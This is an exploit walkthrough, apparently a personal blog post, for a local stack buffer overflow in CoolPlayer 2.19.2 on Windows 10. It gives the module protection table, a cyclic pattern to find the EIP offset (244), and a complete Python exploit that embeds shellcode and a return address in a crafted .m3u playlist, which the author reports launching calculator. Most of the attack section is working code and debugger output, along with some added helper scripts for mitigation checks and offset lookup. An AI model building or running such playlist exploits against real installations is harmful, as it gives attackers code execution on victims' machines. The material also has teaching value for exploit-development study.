CoolPlayer 2.19.2 Exploit (Local)

Category: System Hacking / Windows Pwnable

ii4gsp 2020. 12. 30. 18:20
Test Environment: Windows 10 x64
Test Program: CoolPlayer 2.19.2
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py

----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
 ----------------------------------------------------------------------------------------------------------------------------------
 0x74dd0000 | 0x74df8000 | 0x00028000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [WINMM.dll] (C:\WINDOWS\SYSTEM32\WINMM.dll)
 0x761f0000 | 0x7626b000 | 0x0007b000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [msvcp_win.dll] (C:\WINDOWS\System32\msvcp_win.dll)
 0x759b0000 | 0x75a8b000 | 0x000db000 | True   | True    | True  |  False   | True   | 10.0.19041.685 [gdi32full.dll] (C:\WINDOWS\System32\gdi32full.dll)
 0x752b0000 | 0x7536f000 | 0x000bf000 | True   | True    | True  |  False   | True   | 7.0.19041.546 [msvcrt.dll] (C:\WINDOWS\System32\msvcrt.dll)
 0x76630000 | 0x766f0000 | 0x000c0000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [RPCRT4.dll] (C:\WINDOWS\System32\RPCRT4.dll)
 0x773f0000 | 0x77593000 | 0x001a3000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
 0x76350000 | 0x763c6000 | 0x00076000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [sechost.dll] (C:\WINDOWS\System32\sechost.dll)
 0x00400000 | 0x00485000 | 0x00085000 | False  | False   | False |  False   | False  | -1.0- [coolplayer+.exe] (C:\Users\ii4gsp\CoolPlayer+Portable\App\CoolPlayer+\coolplayer+.exe)
 0x74e00000 | 0x75258000 | 0x00458000 | True   | True    | True  |  False   | True   | 11.00.19041.320 [WININET.dll] (C:\WINDOWS\SYSTEM32\WININET.dll)
 0x763d0000 | 0x764c0000 | 0x000f0000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
 0x75f30000 | 0x75f55000 | 0x00025000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [IMM32.DLL] (C:\WINDOWS\System32\IMM32.DLL)
 0x75370000 | 0x75453000 | 0x000e3000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [ole32.dll] (C:\WINDOWS\System32\ole32.dll)
 0x75b90000 | 0x75bd5000 | 0x00045000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [SHLWAPI.dll] (C:\WINDOWS\System32\SHLWAPI.dll)
 0x75f60000 | 0x760f6000 | 0x00196000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [USER32.dll] (C:\WINDOWS\System32\USER32.dll)
 0x764c0000 | 0x7656f000 | 0x000af000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [comdlg32.dll] (C:\WINDOWS\System32\comdlg32.dll)
 0x768c0000 | 0x76b41000 | 0x00281000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [combase.dll] (C:\WINDOWS\System32\combase.dll)
 0x765b0000 | 0x765c8000 | 0x00018000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [win32u.dll] (C:\WINDOWS\System32\win32u.dll)
 0x76b80000 | 0x77133000 | 0x005b3000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [SHELL32.dll] (C:\WINDOWS\System32\SHELL32.dll)
 0x6c530000 | 0x6c5af000 | 0x0007f000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [DSOUND.dll] (C:\WINDOWS\SYSTEM32\DSOUND.dll)
 0x76750000 | 0x767d8000 | 0x00088000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [shcore.dll] (C:\WINDOWS\System32\shcore.dll)
 0x705e0000 | 0x707f2000 | 0x00212000 | True   | True    | True  |  False   | True   | 6.10 [COMCTL32.dll] (C:\WINDOWS\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627\COMCTL32.dll)
 0x75be0000 | 0x75df4000 | 0x00214000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
 0x75e10000 | 0x75f30000 | 0x00120000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [ucrtbase.dll] (C:\WINDOWS\System32\ucrtbase.dll)
 0x76100000 | 0x76123000 | 0x00023000 | True   | True    | True  |  False   | True   | 10.0.19041.685 [GDI32.dll] (C:\WINDOWS\System32\GDI32.dll)
 0x73490000 | 0x734d4000 | 0x00044000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [powrprof.dll] (C:\WINDOWS\SYSTEM32\powrprof.dll)
 0x77300000 | 0x7737a000 | 0x0007a000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [ADVAPI32.dll] (C:\WINDOWS\System32\ADVAPI32.dll)
 0x70b10000 | 0x70b2d000 | 0x0001d000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [winmmbase.dll] (C:\WINDOWS\SYSTEM32\winmmbase.dll)

Only the loaded system DLLs have protection mechanisms enabled; coolplayer+.exe itself has none (Rebase, SafeSEH, ASLR and NXCompat are all False in the table).
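As an added example (not code from the original post), the following Python 3 script parses a !mona module table like the one above and reports, per module, which mitigations are missing, which is the check a hardening review would run against a product's loaded modules. The three sample rows are copied from the table above; the flag names follow mona's header, where ASLR, SafeSEH and NXCompat correspond to the /DYNAMICBASE, /SAFESEH and /NXCOMPAT linker options. The function names are my own.

```python
import re

MITIGATIONS = ("Rebase", "SafeSEH", "ASLR", "NXCompat")

# Constructed sample input: the header and three rows copied from the
# !mona module table above (the target binary plus two system DLLs).
SAMPLE_TABLE = r"""
----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
 ----------------------------------------------------------------------------------------------------------------------------------
 0x74dd0000 | 0x74df8000 | 0x00028000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [WINMM.dll] (C:\WINDOWS\SYSTEM32\WINMM.dll)
 0x00400000 | 0x00485000 | 0x00085000 | False  | False   | False |  False   | False  | -1.0- [coolplayer+.exe] (C:\Users\ii4gsp\CoolPlayer+Portable\App\CoolPlayer+\coolplayer+.exe)
 0x773f0000 | 0x77593000 | 0x001a3000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
"""


def parse_mona_modules(text):
    """Parse the rows of a !mona modules table into dicts.
    Separator and header lines are skipped; a row is recognised by its
    nine '|'-separated columns and a hex base address in the first one."""
    modules = []
    for line in text.splitlines():
        cols = [c.strip() for c in line.split("|")]
        if len(cols) != 9 or not cols[0].startswith("0x"):
            continue
        match = re.search(r"\[([^\]]+)\]", cols[8])  # "[name.dll]" in the last column
        modules.append({
            "name": match.group(1) if match else cols[8],
            "base": int(cols[0], 16),
            "top": int(cols[1], 16),
            "os_dll": cols[7] == "True",
            "flags": dict(zip(MITIGATIONS, (c == "True" for c in cols[3:7]))),
        })
    return modules


def missing_mitigations(module):
    """Names of the mitigations a parsed module lacks, in table order."""
    return [name for name in MITIGATIONS if not module["flags"][name]]


def mitigation_report(text):
    """Map module name -> list of missing mitigations for every row."""
    return {m["name"]: missing_mitigations(m) for m in parse_mona_modules(text)}


def fully_unprotected(text):
    """Modules loaded with none of the four mitigations at all; these are
    the first candidates for a rebuild with the hardening linker flags."""
    return [name for name, missing in mitigation_report(text).items()
            if len(missing) == len(MITIGATIONS)]


if __name__ == "__main__":
    for name, missing in mitigation_report(SAMPLE_TABLE).items():
        print(f"{name:20s} missing: {', '.join(missing) or 'none'}")
```

Run against the full table from the post, the report flags every Windows DLL for NXCompat only, while coolplayer+.exe is the single module with all four flags missing.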

Use the !mona pc 1000 command to generate a 1000-byte cyclic pattern in which every position is uniquely identifiable.

import struct

# 1000-byte cyclic pattern produced by !mona pc 1000
buf = (
    'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9A' +
    'd0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag' +
    '1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3' +
    'Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5' +
    'Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4' +
    'Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5A' +
    's6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7A' +
    'v8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay' +
    '8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9B' +
    'c0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2' +
    'Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
)

# write the pattern to a playlist file that CoolPlayer will open
f = open('test.m3u', 'w')
f.write(buf)
f.close()

This writes the generated pattern to an .m3u playlist file.

When CoolPlayer loads the generated file, EIP is overwritten with 0x69413169.

In other words, a buffer overflow has occurred.

Looking up that value in the pattern shows that the bytes which reached EIP sit at offset 244.
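The pattern and the offset lookup can be reproduced without the debugger plugin, which is useful for crash triage when mona is not available. The following Python 3 code is an added example, not code from the post: pattern_create builds the same cyclic pattern that !mona pc emits, and pattern_offset locates a crashed register value in it, trying the little-endian byte order x86 stores in memory first and big-endian second. Both function names are my own; looking up 0x69413169 returns 244, matching the offset found above.

```python
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Build a cyclic pattern of the given length in the Metasploit/mona
    style: the 3-byte triplets upper+lower+digit (Aa0 Aa1 ... Zz9) are all
    distinct, so a 4-byte window identifies a single position."""
    out = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        out.append(u + l + d)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def pattern_offset(pattern, value):
    """Locate a crashed register value inside the pattern.

    value may be an int (e.g. EIP as shown by the debugger) or a string.
    For an int, the little-endian byte order x86 uses in memory is tried
    first, then big-endian. Returns the byte offset, or -1 if not found."""
    if isinstance(value, int):
        needles = [struct.pack("<I", value).decode("latin-1"),
                   struct.pack(">I", value).decode("latin-1")]
    else:
        needles = [value]
    for needle in needles:
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return -1


def eip_offset_from_crash(length, eip):
    """Regenerate the pattern that was sent to the program and report
    where the observed EIP value sits in it."""
    return pattern_offset(pattern_create(length), eip)


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat[:33], "...", pat[-10:])
    print("EIP 0x69413169 -> offset", pattern_offset(pat, 0x69413169))  # 244
```

0x69413169 is the bytes 69 31 41 69 in memory, i.e. the text "i1Ai", which is the tail of the triplet "Ai1" followed by the "A" and "i" of "Ai2"; that string first appears 244 bytes into the pattern.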

import struct

# 244 bytes of padding reach the saved return address; the next 4 bytes ('BBBB') land in EIP
buf = ''
buf += 'A' * 244
buf += 'B' * 4

f = open('test.m3u', 'w')
f.write(buf)
f.close()

To confirm control of EIP, check that it changes to the value placed at offset 244 (the four 'B' bytes).

EIP is now 0x42424242 ('BBBB'), which confirms that the four bytes at offset 244 overwrite EIP exactly.

The binary itself has no protection mechanisms (no Rebase, SafeSEH, ASLR or NXCompat), so a stack address can be used directly as the return address.

I will use 0x001926D8 as the return address (ret).

import struct

shellcode = (
  "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
  "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
  "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
  "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
  "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
  "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
  "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
  "\x1c\x39\xbd"
)

payload = ''
payload += 'A' * (244 - len(shellcode))   # padding up to the 244-byte offset
payload += shellcode                       # shellcode sits just before the saved return address
payload += struct.pack('<L', 0x001926D8)  # return address (little-endian): the stack address chosen above

f = open('exploit.m3u', 'w')
f.write(payload)
f.close()

This is the completed exploit code.

The exploit was successful: the shellcode ran and the calculator was launched.